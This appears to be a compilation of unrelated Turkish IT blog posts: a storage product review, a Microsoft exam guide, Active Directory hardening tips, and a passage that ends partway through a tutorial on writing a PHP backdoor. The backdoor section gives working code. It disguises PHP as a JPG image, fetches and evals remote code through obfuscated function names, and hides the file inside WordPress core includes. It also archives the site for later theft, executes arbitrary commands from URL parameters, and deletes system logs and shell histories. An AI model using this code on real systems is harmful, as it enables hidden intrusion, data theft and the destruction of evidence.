Giriş seviyesinde Türkiye’deki kurumların toplamının %60’ının ihtiyacını karşılayabilir. Evet bu söylem bana ait ve bunu her yerde söylüyorum. Çünkü PowerVault ME serisi, PowerVault MD serisinin hem donanımsal olarak hemde yazılımsal olarak yükseltilmiş ve yenilenmiş hali. Performans ve kapasite değerlerine baktığımızda ise hatırı sayılırın üstünde değerler mevcut. Ürün çok yeni, çok kısa zaman önce DellEMC ürün listelerine girdi. PowerVault ME ürün ailesi, ihtiyaç ve gereksinimlere göre son derece sadeleştirilmiş ve seçim konusunda da kolaylık sağlanmış bir aile. Ürün ailesine kısaca baktığımızda aşağıdaki gibi bir tablo ile karşılaşılıyor.

PowerVault ME serisi tamamen block base bir depolama birimi. Yani üzerinde file servisleri ile nfs ve cifs gibi protokoller çalışmaz. Sade ve performans odaklı kullanışlı bir storage. Biraz daha detaylara baktığımızda topluca detay görebileceğimi aşağıdaki ekranla karşılaşıyoruz,

Yukarıdaki özellikleri incelediğinizde eminim ki neden Türkiye genelindeki küçük ve orta seviyeli kurumların %60’ına yetecek bir depolama birimi dediğimi anlamışsınızdır. Yüksek kapasite ye yüksek IO. Tüm iş yüklerine uygun blok base bir storage. Aynı zamanda veri katmanlandırma ile yüksek performans kazanımları arasında.

Birde PowerVault MD serisi ve veliaht PowerVault ME serisi Donanım özelliklerine bir bakalım,

Burada da göreceğiniz üzere ciddi farklar karşımıza çıkıyor. Sadece bu kadar değil aslında yönetim tarafında da eski tip yönetimden HTML5 ara yüze geçiş yapılmış ve kullanım oldukça basitleştirilmiş. İşletim sisteminin neredeyse tüm kodları yeniden yazılarak kullanışlı bir ara yüz kullanıcı deneyimine sunulmuş. Aslında burada açık açık söyleyebilirim ki, yepyeni bir depolama birimi var karşımızda. Peki bu kadar anlattıktan sonra kısa başlıklar halinde bakacak olursak neler görürüz?

ADAPT (Distributed RAID)

Yani dinamik disk pool denilen tüm disklerin bir pool içinde kullanılarak verinin bu diskler üzerine yayılması özelliği ile performans elde edilmesi. Ayrıca bir disk problemi durumunda ciddi problem olan rebuild süresi %50 daha hızlı.

Thin Provisioning

Herkesin bildiği üzere kullanılan verinin boyu kadar disk kullanımı ile verimlilik elde edilmesi.

Read Cache

Yüksek okuma performansı gereken durumlarda SSD disklerinin gücünden faydalanmak için gerekli katmanlandırma teknolojisi

IP Remote Replication

Gerekli durumlarda IP bazlı, storage üzerindeki ethernet portu ile local ya da remote ofisler için verinin asenkron kopyalanması ile güvenlik seviyesinin arttırılması

FC Remote Replication

Eğer lokalde bir DR site yapılandırmayı planlıyorsanız FC port ile asenkron replikasyon ile yapabilirsiniz.

Snapshots

Basit ve çok hızlı şekilde Snapshot alarak istediğiniz zaman geriye dönüş yaparak veri güvenliği sağlayabilirsiniz.

3 Level Tiering

3 Katmanlı gerçek tiering. Verilerinizi performans gereksinimleri doğrultusunda istediğiniz disk tipinde “otomatik olarak” barındırabilirsiniz.

LUN Clone

Gerektiğinde mevcut Volume’ü kopyalayabilirsiniz. Test ortamları için vazgeçilmez isteklerden biridir.

Encryption (SED)

Veri güvenliği olmazsa olmazlardan ise, disk üzerinde şifreleme opsiyonu ile storage’in kendi yetenekleri ile bu ihtiyacınızı karşılayabilirsiniz.

vCenter/SRM

Kusursuz VMware entegrasyonu ile tüm kolay yönetim avantajlarına sahipsiniz.

Kurulumu, kullanımı ve ölçeklendirilmesi son derece basit verimli ve işe yarar bir storage. Rakip ürünleri incelediğimde emin olun yarısı kadar özellikler mevcut. Eminim rakiplerinin benzer ürün çıkartması 1 yıl civarında zaman alacaktır. Uygun fiyata yüksek değerler elde edebileceğimiz ME serisi kurumunuzun genel ihtiyaçlarının tamamını görecek şekilde tasarlanmış.

Şimdi özellikleri incelediğinizde bence sizde en başta yazdığım “Türkiye’deki orta seviye depolama birimlerinin ihtiyacının %60’ını karşılar.” Söylemine sizde katılacaksınız diye düşünüyorum.

Microsoft tarafında Sertifikasyon süreçlerine yeni bir yaklaşım için Online Sınav imkanını devreye almıştı. Bu konuda nasıl bir yol izlememiz açısında sizlerle bilgi paylaşmak istiyorum. Özellikle IT sektöründe kariyer yapmak isteyenlerin, hedefleri olduğunu ama nerden başlamak konusunda kararsız olduğunu bu aşamada en azında kılavuz olması niyetiyle bu yol haritasını anlatmaya çalışacağım.

Geçen hafta için Tüm MCP, MCSA, MCSE ve MCT web sitesinde güncelleme ile bu konuya ne kadar önem verdiğini bir kez daha göstermiş oldu.

Öncelikle ilk sorunun hangi alanda kendini geliştirmesi, detaylıca düşünmesi ona göre adımlarını atması gerekmektedir. İş hayatımızda öncelikle dikey bir alanda uzmanlaşmak o konuya hâkim olduktan sonra yatay anlamda kendimize beceri katabilmemiz sektörün içinde bulunan, her işten biraz anlamaktansa bir konuda uzmanlığımızı ispatlamamız gerekliliği her geçen gün artıyor. MİCROSOFT bunu çözümlediği için, Ana dalların altına ağaç yapısı gibi uzmanlık seviyelerine göre ayırt etmiştir.

Microsoft en son yayınlanan listesine ulaşamadığım için şimdilik bu tablo üzerinden hedeflerimizi belirlememiz gerekiyor.

Ø  MOBILITY

Ø  CLOUD PLATFORM & INFRASTRUCTURE

Ø  PRODUCTIVITY

Ø  DATA MANAGEMENT & ANALYTICS

Ø  APP BUILDER

Ø  BUSİNESS APPLİCATIONS

Bu Ana başlıklar altında hangi konuda Dikey uzmanlık yapmak istediğimiz belirtelim. Bu aşamada yaptığımız değil yatkın olduğumuz alan seçilmeli, çünkü alınacak sertifikanın içinin dolu olması size bir konuda yeterli bilgiyi, öğretmesi sizin gelişimiz için en önemli noktadır.

Artık seçim yönümüzü seçtiğimize göre, anlamlı bir mail adresi ile varsa devam etmeniz olacaktır. Sertifika işlemlerinden sonra bu olayın çokta mümkün olmadığını göreceksiniz.

Microsoft mail uzantılarından [Outlook.com.tr tavsiyem] aşağıdaki linkten devam etmeniz.

https://www.microsoft.com/en-us/learning/dashboard.aspx

Tüm sınavların listelendiği alana gidelim bakalım bizim için uygun alan hangisi.?

Ana başlıklar altından  Data Exams ile devam edeceğim.

https://www.microsoft.com/en-us/learning/browse-all-certifications.aspx

Database Development alanından devam edeceğim. İlgili alanı seçtiğimde yol haritam karşıma gelecektir.

Exam 70-761/Course 20761

Querying Data with Transact-SQL

Exam 70-762/Course 20762

Developing SQL Databases

2 sınav sonrasında    MCSA yetkinliğine ulaşacağımı ayrıca sonrasında  +1 sınav ile MCSE alanına yükselebileceğim bilgisi verilmektedir.

Şu aşamaya kadar hedefimizi yol haritamızı belirleme işlemlerini tamamladık. Artık sınav işlemlerini nasıl yapacağınızı hakkında bilgi vermek istiyorum.

View exam Details   sınav planlama ekranına devam edeceğiz.

Ülkemizin sınav ücretleri son zamanlardaki Dolardaki artışa bağımlı olarak alındığı için, şu an için 600 TL civarında bu açıdan sınava iyi çalışmak kendi yararımıza olacaktır.

Sınav Müfredatı için bu sayfanın altına geldiğimiz zaman açıklayıcı bir bilgi verildiği hangi alanlardan soruların çıkacağı bilgi verilmiştir. Sınav sonucunda tarafınıza verilen sonuç bilgin dede aynı müfredatta ne kadar soruya doğru cevap verdiğimi bilgisi verilmektedir. Eksik yönümüzü görmemiz açısından gayet güzel bir işleyiştir.

Microsoft sınavların Pearson VUE firması tarafından organize edildiği için ilgili şirketin ana sayfasına yönlendirme işlemi yapılıyor.

Adres bilgilerinizi yazmanız özellikle faturalama alanında faydalı olacaktır.

Complete Registration

Bir sonraki aşamaya geçiyoruz.

At a local test center

At my home or office

At a Certiport test center

Bu alanda ilgilendiğimiz 2 alan var aslında Yerel bir test merkezi   veya Yeni eklenen Ev ve Ofis den   sınava girebilme özellikle Ev ve Ofis seçeneği hakkındaki tecrübelerimi paylaşacağım.

Ama âdet yerini bulsun yerel test merkezinden başlayalım.

Sınav dilini belirtmemiz gerekiyor. Sınav aşamasında yerel merkezden girilecek sınav için dili belirtiyoruz.

Sonrasında belirtiğimiz adrese en yakın merkezler listeleniyor. Boş zamanlardan birini seçip ilerliyoruz. Sonrasında ödeme işlemlerini gerçekleştikten sonra test merkezinde sınavımıza girip işlemlerimizi tamamlıyoruz.

Asıl anlatılması gereken seçenek ise Ev ve Ofis’ten sınava girme imkânı bu görüldüğü kadar değil aslında kayıt aşaması diğer seçenekten farksız olmasına rağmen online sınav anında katı kurallara tabi olabilirsiniz.

Örnek   çalışma masanızda su bile bulundurma şansınız yok.

Şimdi İlgili seçeneği seçip devam edelim.

Görüldüğü gibi katılım şartları hakkında epey madde var, Tabiki diğer seçenekten daha kullanışlı olduğu gayet açık belirli bir adres hiç fark etmez girme şansınız özellikle İstanbul ve Ankara uzak alanlarda yaşanan sıkıntıların aşılması eğitim hakkınızın size sunulması online girme şansı ile sınav öncesi yaşanan şehir değişikliğinin verdiği yoğunluğun olmaması güzel bir artı olarak değerlendirilmesi gerekmektedir.

Ayrıca yerel test merkezlerinde belirli günlerde sadece 1 gün Perşembe Sanırım sınavlara girilebilmesi, online aşamadınsa böle bir kısıt yok ama tabiki Microsoft bundan hariç bir politikası var.

Sınav Süreleri: 2 Saat

Ortalama Soru: 48

Toplam İstenen Puan: 700

Sınavda yetersiz puan alanların çok dikkatli olması gerekiyor. Neden mi?

Aynı Sınav bir sonraki giriş engellemesi

1.Sınav: 24 Saat Sonra 2 Sınav

2. Sınav :14 Gün sonra 3 Sınav

3.Sınav: 14 Gün sonra 4 Sınav

4: Sınav: 14 Gün Sonra 5 Sınav

5.Sınav: 12 Ay Sonra

Her sınav arasında belirli aralıkla gün sayısı ile kullanıcıya çalışma fırsatı tanınıyor.

Sonrasında tarih işlemlerine geliyoruz.

İlgili sınav işlemini tarihini belirtiyoruz. Saat konusunda dikkat etmemizde yarar var. Saat farkını dikkate almadan size en uygun zaman aralığını seçmenizde yarar var.

Bu aşamadan sonra ödeme işlemleri her sitede olduğu gibi satın alma işlemlerini yapıyoruz. Belirtilen adrese mail ile fatura ve Sınav bilgilerini gönderiliyor.

Your dasboard alanına dönüp “Start a previously scheduled online proctored exam” planlanmış sınavlarımızı görüntüleyebiliriz.

Sınav süresinden yarım saat önce ilgili alan aktif olacak ve sınav için size bağlantı gerçekleştirilecektir.

https://www.youtube.com/watch?v=zjTcodH2EbA

Online sınav Öncesi dikkat etmeniz gereken bilgiler yukardaki eğitim materyalinde bulunmaktadır.

İPUÇLARI

Eğitim salonunun sade olmasına dikkat ediniz.

Masaüstünüzde herhangi bir cihaz vs bulunmaması sizin yararınıza olacaktır.

Sınav politikaları belirten kişiyi iyi dinleyiniz. Dil İngilizce olduğu için Birde Hintli çıkarsa

Sınav sırasında asla kamera önünden ayrılmayınız.

Kesinlikle dışardan kapıyı kapalı tutunuz. Olurda biri girmek isterse sınavınız iptal edilir.

İnternetiniz kesinti yaşamayacağını emin olunuz Wifi yerine kablo kullanmanızı öneririm.

Umarım faydalı bir içerik olmuştur.

Konu hakkında aklınıza takılanları tarafıma bildirebilirsiniz.

Günümüzde güvenlik her şirket için önemli bir başlık olmasına karşın güvenlik konseptinde derinlik ne yazık ki temel anlamda firewall, anti virüs, son dönemde DLP gibi ana başlıklardan daha derine inemiyor. Özellikle çok fazla bütçe ve uzman ile kurulan banka ortamlarında bilen yaşanan büyük zafiyetlerin aslında uygulama temelli zafiyetler olduğunu gördükçe güvenlik algısının sadece yüzeysel ürün temelli değil uygulama bazlı yapılması gerektiğini bir kez daha görmüş oluyoruz.

Peki her uygulama için güvenlik sıkılaştırma çalışması yapılabilir mi? Pek çok global üretici için uygulamalarının en iyi güvenlik çözümleri, yapılandırmaları veya birlikte çalışma senaryoları bulunmaktadır, ancak özellikle büyük şirketler için bunları tek tek hayata geçirmek var olan karmaşık yapıyı daha içinden çıkılmaz bir hale sokabileceği gibi bütçe ve zaman açısından yönetimi zordur. Bundan dolayı özellikle zafiyet testleri sonucunda kritik uygulamalar hedef alınır. Ancak küçük şirketler için ne yazık ki zafiyet taramalarının bütçesinin bile bulunması sorun olabiliyor. Madem öyle daha minimal yapılar için neler önerebiliriz?

Tabiki bu işin doğrusu öncelikle bir veya bir den çok uzman ile mevcut yapı için zafiyet testlerinin uygulanması, sonuçlarının değerlendirilmesi, uygulanması ve bu zafiyetlerin kapatıldıktan sonra tekrar bir test yapılmasıdır. Hatta buna ek olarak “security hardening” olarak bilinen ve yine büyük kurumlar tarafından özellikle OS seviyesinde yaptırılan sıkılaştırma çalışması sayesinde testlerde çıkmayan ancak üreticilerin önerdiği en iyi yapılandırmaları gerçekleştirerek güvenlik seviyenizi daha yukarılara çekebilirsiniz.

Bende pek çok müşterime aslında bu noktada herhangi bir ürün almadan yardımcı olmak için sağlık taraması adı altında hizmet sunmaktayım. Bu makaledeki amacım da bu sağlık taraması kapsamında yaptığım çalışmaların bir bölümü olan Active Directory için güvenlik anlamında neleri kontrol etmeniz ve nasıl yapılandırmanız gerektiğini paylaşmaktır. Günün sonunda sağlık taraması sadece 27001, KVKK, güvenlik gibi başlıkları değil aynı zamanda sisteminizin ne kadar sağlıklı çalışıp çalışmadığını ve kritik bulguların olup olmadığını görmeniz için alabileceğiniz bir servis.

Bunu yapan ya da aslında yaptığını iddia eden pek çok araç görebilirsiniz. Ancak birkaç temel rapor ve pasta dilimi görseller ile kritik alt yapılarınız için yorum yapmanız doğru olmayacaktır. Nasıl zafiyet tarama ürünlerinin olmasına karşın Pentest adı altında uzman danışmanlara ücret ödeyip gerçek hayat senaryolarının sisteminiz üzerinde denenmesini sağlıyorsanız yine bir uzmanın sizin yaşayan bu sisteminiz için yorum yapması çok kıymetlidir.

Peki gelelim konumuza, güvenli bir Active Directory için nelere dikkat etmemiz gerekiyor?

1 – Varsayılan Hesapların Kapatılması veya Değiştirilmesi

Öncelikle ne yazık ki hala pek çok sistem yöneticisi Active Directory ile beraber gelen Administrator olarak isimlendirilen varsayılan hesap ile sistemlerini yönetmektedir. Bu pek çok ransomware başta olmak üzere uzak erişim ve sonrasında verilerin şifrelenmesi ile sonuçlanan atakları kolaylaştırmaktadır. Çünkü hala pek çok şirket dış dünyaya RDP açık sistemler barındırmakta ve hele varsayılan kullanıcı ile bu sistemleri yönetiyor ise zaman içerisinde şifre deneme yanılma yolu ile kolaylıkla bu sistemlere sızmak mümkündür. Sadece ransomware değil pek çok hak yükseltme, içeriden gelen ataklarda da varsayılan admin hesapların kullanılması büyük zafiyetlere neden olmaktadır. Bu nedenle ilk olarak varsayılan Administrator hesabının kopyalanarak yeni bir yönetici hesabı oluşturulması ve mevcut yönetici hesabının tüm yetkilerinin alınması gereklidir. Bu sayede örneğin “Hakan” isminde standart bir user olarak görünen ama oysaki “Administrator” hesabının yerine geçen yeni bir yönetici hesabınız olacaktır. Mevcut hesabı bu şekilde kopyalayacak uzmanlığınız yok ise en kötü “rename” yani Administrator yerine “hakan” kullanarak” en azından varsayılan brüte force şifre bulma atakları için öne geçebilirsiniz.

2 – Yönetici Hesapları Ayrıştırılması

Bir diğer sık yaptığımız hata ise tek bir kullanıcı hesabı ile hem kişisel bilgisayarımızı hem Forest/Domain ortamını yönetiyor olmamız. Burada her şirket için farklı çözüm oluşturabileceğimiz gibi en iyi senaryo olarak kendi bilgisayarımız için “hakan”, uzak son kullanıcı bilgisayarlarını yönetmek için “wrk_hakan”, domain ortamındaki sunucuları yönetmek için “srv_hakan” ve Active Directory, Exchange, CA Server gibi kritik alt yapı sunucuları için “ent_hakan” kullanıcı hesaplarını oluşturmanız ve en önemlisi de örneğin srv_hakan kullanıcısının veya buna bağlı grubun üyelerinin herhangi bir son kullanıcı bilgisayarına giriş yapmasına izin vermemeniz gereklidir. Benzer şekilde ent_hakan da DC, Exchange gibi sunucuların dışında herhangi bir sunucuya login olmamalıdır. Ayrıca varsayılan olarak gelen domain admins grubu tüm bilgisayarlarda local admin olduğu için onu da kaldırmanız ve son kullanıcı makineleri, sunucular için ayrı lokal admin grupları oluşturmanız şarttır.

3 – Kritik Grup Üyeliklerinin Kontrolünün Sağlanması

Güvenlik emek ister tabiki gönül ister ki hiç ürün satın almayalım ancak bazı noktalarda temel Audit veya siem ürünleri güvenlik için şart. SIEM belki bu madde için çok lük kalabilir ancak lepide gibi uygun maliyetli bir Audit ürünü ile AD kritik grupların üyelik güncellemelerini mutlaka takip etmeniz gereklidir. Bu sayede olası bir hak yükseltme veya 2. Maddedeki senaryoyu bozan bir yönetici olması halinde bundan mutlaka haberdar olmanız gereklidir.

4 – Lockout Policy

Çok temel bir policy olmasına karşın hala çok büyük yapılarda bile Lockout policy olmadığına sağlık taraması çalışmalarım sırasında karşılaştım. Bunun tabiki yönetimi bir hayli zor olduğu için her müşterinin farklı bir yorumu bulunur ancak tartışmasız en temel Active Directory güvenlik önlemi lockout policy uygulanmasıdır.

5 – Password Policy

Çok temel bir bilgi olduğu ve artık bu konuda çok ciddi farkındalık olduğu için üzerinde çok durmayacağım, ancak burada önemli olan nokta eğer yetkili hesap segmentasyon yapmışsanız tek sorun yöneticinizin sahip olduğu tüm hesaplara aynı şifreyi vermesi olacaktır ki bunu engellemezseniz aslında sizin herhangi bir ürün almadan sağladığınız hak yükseltme koruma özelliğiniz bir anda çöp olabilir.

6 – Eski Kullanıcı ve Makine Hesaplarının Temizlenmesi

Ne yazık ki pek çok sağlık taramasında bu noktanın düzenli olarak yapılmadığını görüyoruz. Banka, Telekom veya global firmalar gibi düzenli denetlenen firmaların dışında ne yazık ki işten ayrılmış kullanıcı hesaplarının hala aktif olarak kaldığını görebiliyoruz. Burada gerek makine gerekse kullanıcı hesaplarının düzenli kontrol edilmesi ve gereksiz olan hesapların önce disable, daha sonra şirket politikasına göre silinmesi güvenliğinizi arttıracak adımlardan birisi olacaktır.

7 – Düzenli Yama Yüklenmesi

Çok geleneksel olacak ama OS seviyesinde çıkan kritik yamalar Active Directory ortamınız için çok büyük risk doğurabilir. Sadece OS seviyesinde değil özellikle son dönemde gördüğümüz CPU zafiyetleri de ne yazık ki çok ciddi güvenlik zafiyetlerine neden olduğu için aslında AD ortamınızı üzerinde barındırdığınız donanımların firmware yüklemelerinden OS yamalarına kadar güncel bir sistem kullanıyor olmanız gerekli. Şimdi yama yüzünden kesinti yaşan müşterilerin “aman hocam bana yama deme” dediğini duyar gibiyim ama yine hep dediğim gibi pilot dağıtım, test yapmadan yapılan her yama hangi sisteme olur ise olsun büyük bir zarar verme potansiyeli taşır. Bu üreticilere göre farklılık göstermek ile beraber bu kötü tecrübeler ne yazık ki sistemlerimizi bilinen zafiyetlere karşı korumasız bırakmamız için bir bahane olamaz. Yama yönetimi aslında başlı başına ayrı bir konu olduğu için bunu da geçiyorum şimdilik.

8 – Çoklu Kimlik Doğrulama

Active Directory gibi sistemlere erişimlerin sınırlanması ve hatta bu tür sistemlere giriş yapabilecek makinelere ise smart card gibi ek güvenlik önlemleri ile girebiliyor olmanız ayarlanmış olması gereklidir. Örneğin bizim en değerli varlıklarımızdan birisi olan mali varlığımıza erişirken nasıl kimse sms veya benzeri ikinci doğrulama mekanizmalarından vazgeçmiyor ise bir şirket için verilerde en değerli varlıklar olduğundan suyun başındaki konumu nedeni ile AD erişimleri mutlaka MFA – 2FA cihazları ile desteklenmelidir.

Bu basit bir örnek

http://www.cozumpark.com/blogs/donanm/archive/2018/08/05/yubikey-for-windows-hello-ile-guvenliginizi-arttirin.aspx

9 – İzleme

Aslında grup değişiklikleri izlenmesi başlığında izleme noktasının öneminden bahsetmiştim, ancak bu çok özel bir izleme örneği olup her şirketin bunu yapması bazen mümkün olmuyor, ancak bu maddeyi gerçekleştiremiyor olsanız dahi genel olarak AD üzerindeki GPO, DNS, AD değişikliklerinden mutlaka haberdar olmanız gerekli, aksi halde bu maddeye kadar yapmış olduğunu pek çok değişiklik kötü amaçlı olarak geriye doğru değiştirilebilir ve bundan haberiniz olmayabilir. Bu konuda Lepide, Netwrix, Manage Engine, Change Auditor gibi pek çok Audit yazılımı kullanabilirsiniz. Tabiki sahip olduğunuz SIEM’ i eğiterek kritik durumlar için yine log üretmesini sağlayarak bu ihtiyacı karşılayabilirsiniz ama benim her zaman tercihim AD, Exchange gibi kritik servisler için özelleşmiş Audit yazılımları almak olacaktır. SIEM olsun bana bir zararı yok hatta tüm logları topluyor süper ama T anında o SIEM den istediğim bilgiyi almak bazen zor bazen imkânsız olabiliyor.

10 – Yedekleme ve Felaket Senaryosu

Evet en iyi güvenlik önlemlerinden biriside tabiki çok sağlam bir yedeğinizin olması. Veya olası bir saldırı, şifre ele geçirme ya da servis kesintisi gibi ataklar için geri dönüş planınızın olmasıdır. Buna sahip iseniz pek çok beklenmedik saldırı için kurtarma senaryonuz hazır olacaktır.

Evet, elimden geldiği kadar basit olarak bir farkındalık makalesi hazırlamaya çalıştım. Tabiki benden 27001 özelinde, KVKK veya temel sağlık taraması alan müşterilerimin sadece Active Directory için 184 noktaya baktığımı biliyorlar, yani bu işin hepsini burada makaleye dökmek ne yazık ki çok ciddi bir zaman alacağı için ben en azından böyle hizmetler veya ürünler alamayan pek çok kobi çapındaki firmalar için yardımcı olmak amacı ile bu bilgilerimi paylaştım. Ancak daha ciddi iş ihtiyaçlarınız ve bütçeniz var ise tabiki benim gibi bir uzmandan böyle profesyonel bir tarama hizmeti ile durum rapor edinmeniz ve sonrasında da ister mevcut ekipleriniz ile, iste danışmanlarınız ile iyileştirme çalışmasını Active Directory gibi kritik tüm sistemler için yapmanızı öneririm.

Makalemde kullandığım birtakım görseller için kaynaklar aşağıdaki gibidir;

https://www.petri.com/wp-content/uploads/sites/3/2016/11/Adaxes-Active-Directory-Cleanup.png

https://www.lepide.com

Bilişim çağının başlangıcından beri zararlı yazılımlar/virusler hep var olmuştur. Bunların kimisi para talep ederken, kimisi ise kendini belli etmeden, gizlice çalışır. Günümüzde yüz binlerce zararlı yazılım var, gittikçe de artıyor. Her geçen gün daha çok etki yaratabilen, kendini daha iyi gizleyebilen zararlı yazılımlar çıkıyor. Tarihe adını yazdıran bu yazılımları incelediğimizde son çıkan yazılımın öncekilere oranla daha çok mağduriyet doğurduğunu görebiliriz. Buradan da anlıyoruz ki, virüsler artık daha akıllı hale geliyor.

Günümüzde yalnızca bir virüs üretmek yeterli olmuyor. Bu virüsü öyle donatmalıyız ki, kendini iyi gizleyebilmeli, etkili olmalı, güvenlik duvarları tarafından fark edilmemeli, kendi kendini yönetebilmeli.

Yani kötü amaçlı kişiler, kodladığı virüs kendisi gece uyurken dahi saldırı yapabiliyorsa, kendisinden bağımsız çalışabiliyor ve kendi kendini yönetebiliyorsa burada yapay bir aklın varlığından söz edebiliriz.

Virüslerin çalışma mantığını anladığımız takdirde onları engellememiz daha kolay olacaktır. Bu yazıda basit bir backdoor (arka kapı virüsü) üretip hacker’ın izleyebileceği olası bir saldırı stratejisi görmüş olacağız. Virüsü PHP dilinde üreteceğiz, öyleyse başlayalım.

Adım 1)- Kendini Gizle

Yapılacaklar:

1.      Dosya tipi değiştirme,

2.      Kodları gizleme,

3.      Dosyayı saklama.

Dosya Uzantısı Değiştirmek: Dosya uzantısını .php yerine .jpg şeklinde değiştirmek gizlenmek için etkili bir yöntem olabilir. Yetkililerin “Bu bir JPG (resim) dosyası, sunucuya zarar veremez!” şeklindeki önyargısı sayesinde zararlı yazılımımızın gözlerinden kaçmasını sağlamalıyız, aynı zamanda bu şekilde bazı firewall’ların gözünden de kaçabiliriz.

Zararlı dosyamızın adı logo.jpg olsun. Çalışacağımız dizinde logo.jpg ve .htaccess adlarında iki dosya oluşturalım.

.htaccess dosyasının kodu:

AddType application/x-httpd-php .php .jpg

Artık sunucu .php uzantılı dosyaları .jpg uzantısında çalıştırmamıza olanak sağlayacak.

Kodları Gizlemek: Yazdığımız virüsün kodları, sunucuda kurulu olan bir firewall tarafından algılanıp silinebilir veya sistem yetkililerine haber verilebilir. En kötü ihtimalle yetkili şüpheli gördüğü dosyayı açıp kodlarını inceleyebilir. Virüsün kodlarını o kadar iyi gizlemeliyiz ki, inceleyenler şüpheli görünen kodlarla karşılaşmasın, güvenlik duvarı içeride neler döndüğünü anlayamasın. Bu yüzden kodları doğrudan virüs dosyamızın içine (logo.jpg) eklemeyeceğiz. İlgili zararlı kodları, başka bir internet sitesinden çekeceğiz. Ne kadar masumane değil mi?

Zararlı kodları çekeceğimiz adres https://infinitumit.com.tr/kodlar/virus.txt olsun.

O halde az önce oluşturmuş olduğumuz virüsümüze (logo.jpg dosyasına) şu kodları yazabiliriz:

<?php

eval(file_get_contents("https://infinitumit.com.tr/kodlar/virus.txt"));

Fakat bu betiği biraz daha gizli hale getirmemiz gerekiyor. Zira bu haliyle firewall’lar tarafından kolaylıkla algılanabilir. O zaman kodları aşağıdaki gibi değiştirelim, her iki betik de aynı görevi görecektir.

<?php

error_reporting(0);

$x = "ht";

$y = "tp";

$z = "s:";

$a = "//infinitumit.";

$b = "co";

$c = "m.tr/kodlar/virus.txt";

$k  = 'e'.'vA'.'l';

$l = 'c' . 're' . 'aTe' . '_'. 'fu' . 'nCt'. 'ion';

$m  = $l('$n', $k . '($n);');

$m(@file_get_contents($x.$y.$z.$a.$b.$c));

Doğrudan URL’i yazmama sebebimiz, tüm dosyaları kapsayacak şekilde kaynak kodlarda bir arama yapıldığında üçüncü taraf URL’in görünmemesini sağlamak. Yine doğrudan eval(); fonksiyonunu yazmadık çünkü eval fonksiyonu da genellikle firewall’lar tarafından kara listede tutulur. Aynı zamanda hata bastırma kodları ekleyerek olası bir aksaklıkta sitenin hata vermemesini sağlayacağız.

Ya da bir encoder yardımıyla şifrelerin tamamını daha güçlü bir algoritmayla şifreleyebilirsiniz.

Dosyayı Saklamak: Dosyamızı şüphe çekmeyecek bir dizinde saklamalıyız. Örneğin, WordPress yazılımında /wp-content/uploads/ klasörü gayet mantıklı. Siz hedef sitedeki CMS’e göre uyarlamalısınız, ben bilindik olduğu için WordPress’i örnek göstereceğim.

Eğer yazı sonunda bahsettiğim zamanlama özelliğinin sizin müdahaleniz olmadan çalışmasını istiyorsanız wp-config.php gibi sitenin tamamında kullanılan bir dosyaya virüsünüzü include etmelisiniz. Virüsümüzü (logo.jpg dosyası) doğrudan wp-config.php dosyasına include etmek tehlikelidir zira bir virüs bulaşması durumunda öncelikle wp-config.php dosyası kontrol edilir. O halde wp-config.php dosyasıyla bağlantılı bir dosyaya ekleyelim. Örneğin /wp-includes/default-constants.php, /wp-includes/pomo/mo.php gibi dosyalar, wp-config.php dosyasıyla bağlantılıdır. wp-config.php dosyasının içine wp-settings.php include edilir, wp-settings.php dosyasını açtığımızda da az önce bahsettiğimiz dosyaların include edilmiş olduğunu görebiliriz. Yine logo.jpg dosyamızı ilgili dizine atarak ilgili dosyalara şu kodu ekleyebiliriz:

@include("logo.jpg");

Böylelikle virüsü yazmada ilk adımı (gizlilik) tamamlamış olduk.

Adım 2)- Virüsü Geliştir

Yapılacaklar:

1.       Otomatik yedek alma,

2.      Komut çalıştırma,

3.      Otomatik log silme,

4.      Kendi kendini imha etme.

Bu bölümde yazacağımız kodları https://infinitumit.com.tr/kodlar/virus.txt adresine kaydedeceğiz ve logo.jpg dosyası kodları siteden çekecek. Yani virüsümüzün kodlarını sitemizde barındıracağız, logo.jpg dosyası aracı olacak. Dolayısıyla şimdilik logo.jpg dosyasıyla işimiz yok.

Yazılacak olan betikler sunucu konfigürasyonuna göre değişiklik gösterebilir.

Otomatik Yedek Alma:

Sitenin ana dizininin .zip olarak yedeğini alacağız ve bu yedeği gizli bir klasörde saklayacağız. Bu sayede istediğimiz zaman yedeği indirebiliriz. Kırmızı renkli bölüm, arşivin saklanacağı dizini göstermektedir, mor renkli satır ise hangi fonksiyonu çalıştıracağımızı göstermektedir. Aşağıdaki kod işimizi görecektir.

if(@$_GET['i'] == 'ydk'){

error_reporting(0);

$k  = 's'.'yS'.'t'.'eM';

$l = 'c' . 're' . 'aTe' . '_'. 'fu' . 'nCt'. 'ion';

$m  = $l('$n', $k . '($n);');

$m('zip -r x.zip '.$_SERVER["DOCUMENT_ROOT"].' & & mv x.zip ./wp-content/uploads/');

}

Özelliği kullanabilmek için http://hedefsite.com/logo.jpg?i=ydk şeklinde giriş yapmak gerekir. System(); fonksiyonu örnektir.  Komut çalıştırmaya yarayan fonksiyonlardan hangileri sunucuda izinliyse, o fonksiyonları kullanabilirsiniz.

Komut Çalıştırma:

if($c = @$_GET['c']){

error_reporting(0);

$k  = 's'.'yS'.'t'.'eM';

$l = 'c' . 're' . 'aTe' . '_'. 'fu' . 'nCt'. 'ion';

$m  = $l('$n', $k . '($n);');

$m($c);

}

Sadece hedefsite.com/logo.jpg?c=KOMUT şeklinde girildiğinde çalışır. Örnek:

Log Silme:

Hacker, işi bittikten sonra bıraktığı izleri silmek isteyecektir. Aşağıdaki kod log’ların yaygın olarak bulunduğu yerleri temizler. Bu işlem yetki gerektirebilir.

if(@$_GET['i'] == "lgsl"){

error_reporting(0);

$k  = 's'.'yS'.'t'.'eM';

$l = 'c' . 're' . 'aTe' . '_'. 'fu' . 'nCt'. 'ion';

$m  = $l('$n', $k . '($n);');

$sl = 'rm -rf /tmp/logs

rm -rf $HISTFILE

rm -rf /root/.ksh_history

rm -rf /root/.bash_history

rm -rf /root/.ksh_history

rm -rf /root/.bash_logout

rm -rf /usr/local/apache/logs

rm -rf /usr/local/apache/log

rm -rf /var/apache/logs

rm -rf /var/apache/log

rm -rf /var/run/utmp

rm -rf /var/logs

rm -rf /var/log

rm -rf /var/adm

rm -rf /etc/wtmp

rm -rf /etc/utmp

find / -name *.bash_history -exec rm -rf {} ;

find / -name *.bash_logout -exec rm -rf {} ;

find / -name "log*" -exec rm -rf {} ;

find / -name *.log -exec rm -rf {} ;';

$m($sl);

}

